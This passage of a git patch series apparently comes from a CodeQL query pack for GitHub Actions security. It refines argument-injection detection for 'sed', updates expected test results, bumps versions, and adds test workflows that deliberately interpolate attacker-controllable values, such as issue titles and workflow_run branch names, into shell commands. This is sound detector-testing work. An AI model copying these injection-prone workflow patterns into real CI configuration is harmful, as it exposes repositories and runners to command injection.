.github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | 
@@ -13,6 +14,8 @@ edges | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 124a26b1d47a..41c465dcc27c 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,6 +1,7 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning7.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning7.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning8.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | 
| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 7b758b0da6d5..b4a099672a4f 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -9,9 +9,10 @@ edges | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | -| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact | -| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step | -| .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step | +| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | +| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | +| .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:16:9:18:40 | Run Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | 
@@ -326,6 +327,7 @@ edges | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -360,5 +362,6 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | From 8d75250da74bad44e301d4a9c7553500948b5e07 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:05:29 +0200 Subject: [PATCH 396/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3d20e00dddea..79545959a7df 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.16 +version: 0.1.17 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6b41b38f9a4c..30ed4dc6dae9 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.16 +version: 0.1.17 groups: [actions, queries] suites: codeql-suites extractor: javascript From adbb2364655e3f871e5fd04764edeaa8dd90d874 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:45:49 +0200 Subject: [PATCH 397/707] fix(query): Better identification of argument injection commands --- ql/lib/codeql/actions/config/Config.qll | 5 ++++- ql/lib/ext/config/argument_injection_sinks.yml | 2 +- .../CWE-094/.github/workflows/arg_injection.yml | 8 ++++---- .../CWE-094/ArgumentInjectionCritical.expected | 12 +++++++++--- .../CWE-094/ArgumentInjectionMedium.expected | 8 ++++++-- 5 files changed, 24 insertions(+), 11 deletions(-) diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 1cc8ce4eb8a1..8d97e63786b5 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -91,5 +91,8 @@ predicate untrustedEventPropertiesDataModel(string property, string kind) { * - argument_group: capture group for the argument. */ predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { - Extensions::argumentInjectionSinksDataModel(regexp, command_group, argument_group) + exists(string sub_regexp | + Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and + regexp = ".*(^|;|\\$\\(|`|\\||&&)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$).*" + ) } diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 8a9350cfebbc..727c982d2ec2 100644 
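Review bot: The wrapper prepends one capture group (the `^`/`;`/`$(`/backtick/`|`/`&&` prefix alternation) before `sub_regexp`, so `command_group` and `argument_group` in the extension data now count from the wrapped pattern rather than from the row's own regexp — that is why the next hunk moves argument_injection_sinks.yml from `1, 2` to `2, 3`, yet the visible doc comment (`- argument_group: capture group for the argument.`) still reads as if the indices referred to the row's regexp. Either document it (`* Group indices are relative to the wrapped regexp: the prefix contributes group 1, so a row's own groups are offset by one.`) or keep the data self-describing by binding the row's groups to fresh variables inside the `exists` and shifting them in QL: `command_group = cg + 1 and argument_group = ag + 1`. Separately, the terminator alternation includes `-`, so with the lazy `(.*?)` argument group of the new `sed` row an invocation that starts with an option (`sed -e "s/FOO/$TITLE/g"`) ends the argument group at the `-` and captures an empty string; if the query locates the tainted expression inside `argument_group`, such commands would be missed, and the updated arg_injection.yml fixture in the same commit only exercises bare `sed "..."` forms. The predicate's doc comment starts outside the hunk.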
--- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -4,5 +4,5 @@ extensions: extensible: argumentInjectionSinksDataModel # https://gtfobins.github.io/ data: - - [".*(sed) (.*)", 1, 2] + - ["(sed)(.*?)", 2, 3] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml index b5478a5e1366..19435af16d3b 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -10,10 +10,10 @@ jobs: env: TITLE: ${{github.event.issue.title}} steps: - - run: | - echo "s/FOO/$TITLE/g" - - run: | - sed "s/FOO/$TITLE/g" + - run: echo "s/FOO/$TITLE/g" + - run: sed "s/FOO/$TITLE/g" + - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar + - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index 5b82e52682e0..21483efe36ca 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected 
@@ -1,8 +1,14 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | subpaths #select -| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | sed | +| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | +| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | +| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index 37fd97270d7f..c2ff2885a995 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected 
@@ -1,7 +1,11 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | subpaths #select From 56af52a729c8a614b2cb4c3784b13622dc519110 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:46:37 +0200 Subject: [PATCH 398/707] feat(tests): New tests for Command Injection Injections on a workflow_run trigger protected by a branch allow-list should not be reported as critical --- .../CWE-094/.github/workflows/test10.yml | 568 ++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 6 + .../CWE-094/CodeInjectionMedium.expected | 12 + 3 files changed, 586 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml new file mode 100644 index 000000000000..1bc02ccd826e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml 
@@ -0,0 +1,568 @@ +name: Self-hosted runner (push) + +on: + workflow_run: + workflows: ["Self-hosted runner (push-caller)"] + branches: ["main"] + types: [completed] + push: + branches: + - ci_* + - ci-* + paths: + - "src/**" + - "tests/**" + - ".github/**" + - "templates/**" + - "utils/**" + repository_dispatch: + +env: + HF_HOME: /mnt/cache + TRANSFORMERS_IS_CI: yes + OMP_NUM_THREADS: 8 + MKL_NUM_THREADS: 8 + PYTEST_TIMEOUT: 60 + TF_FORCE_GPU_ALLOW_GROWTH: true + RUN_PT_TF_CROSS_TESTS: 1 + CUDA_VISIBLE_DEVICES: 0,1 + +jobs: + setup: + name: Setup + strategy: + matrix: + machine_type: [single-gpu, multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + outputs: + matrix: ${{ steps.set-matrix.outputs.matrix }} + test_map: ${{ steps.set-matrix.outputs.test_map }} + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # `CI_BRANCH_PUSH`: The branch name from the push event + # `CI_BRANCH_WORKFLOW_RUN`: The name of the branch on which this workflow is triggered by `workflow_run` event + # `CI_BRANCH`: The non-empty branch name from the above two (one and only one of them is empty) + # `CI_SHA_PUSH`: The commit SHA from the push event + # `CI_SHA_WORKFLOW_RUN`: The commit SHA that triggers this workflow by `workflow_run` event + # `CI_SHA`: The non-empty commit SHA from the above two (one and only one of them is empty) + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ 
github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Cleanup + working-directory: /transformers + run: | + rm -rf tests/__pycache__ + rm -rf tests/models/__pycache__ + rm -rf reports + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Fetch the tests to run + working-directory: /transformers + # TODO: add `git-python` in the docker images + run: | + pip install --upgrade git-python + python3 utils/tests_fetcher.py --diff_with_last_commit | tee test_preparation.txt + + - name: Report fetched tests + uses: actions/upload-artifact@v4 + with: + name: test_fetched + path: /transformers/test_preparation.txt + + - id: set-matrix + name: Organize tests into models + working-directory: /transformers + # The `keys` is used as GitHub actions matrix for jobs, i.e. `models/bert`, `tokenization`, `pipeline`, etc. + # The `test_map` is used to get the actual identified test files under each key. 
+ # If no test to run (so no `test_map.json` file), create a dummy map (empty matrix will fail) + run: | + if [ -f test_map.json ]; then + keys=$(python3 -c 'import json; fp = open("test_map.json"); test_map = json.load(fp); fp.close(); d = list(test_map.keys()); print(d)') + test_map=$(python3 -c 'import json; fp = open("test_map.json"); test_map = json.load(fp); fp.close(); print(test_map)') + else + keys=$(python3 -c 'keys = ["dummy"]; print(keys)') + test_map=$(python3 -c 'test_map = {"dummy": []}; print(test_map)') + fi + echo $keys + echo $test_map + echo "matrix=$keys" >> $GITHUB_OUTPUT + echo "test_map=$test_map" >> $GITHUB_OUTPUT + + run_tests_single_gpu: + name: Model tests + needs: setup + # `dummy` means there is no test to run + if: contains(fromJson(needs.setup.outputs.matrix), 'dummy') != true + strategy: + fail-fast: false + matrix: + folders: ${{ fromJson(needs.setup.outputs.matrix) }} + machine_type: [single-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! 
-z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Echo folder ${{ matrix.folders }} + shell: bash + # For folders like `models/bert`, set an env. var. (`matrix_folders`) to `models_bert`, which will be used to + # set the artifact folder names (because the character `/` is not allowed). 
+ run: | + echo "${{ matrix.folders }}" + echo "${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }}" + matrix_folders=${{ matrix.folders }} + matrix_folders=${matrix_folders/'models/'/'models_'} + echo "$matrix_folders" + echo "matrix_folders=$matrix_folders" >> $GITHUB_ENV + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /transformers + run: | + python3 utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /transformers + run: | + python3 -m pytest -n 2 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} ${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }} + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }}/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports + path: /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} + + run_tests_multi_gpu: + name: Model tests + needs: setup + # `dummy` means there is no test to run + if: contains(fromJson(needs.setup.outputs.matrix), 'dummy') != true + strategy: + fail-fast: false + matrix: + folders: ${{ fromJson(needs.setup.outputs.matrix) }} + machine_type: [multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus all --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` 
event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Echo folder ${{ matrix.folders }} + shell: bash + # For folders like `models/bert`, set an env. var. (`matrix_folders`) to `models_bert`, which will be used to + # set the artifact folder names (because the character `/` is not allowed). 
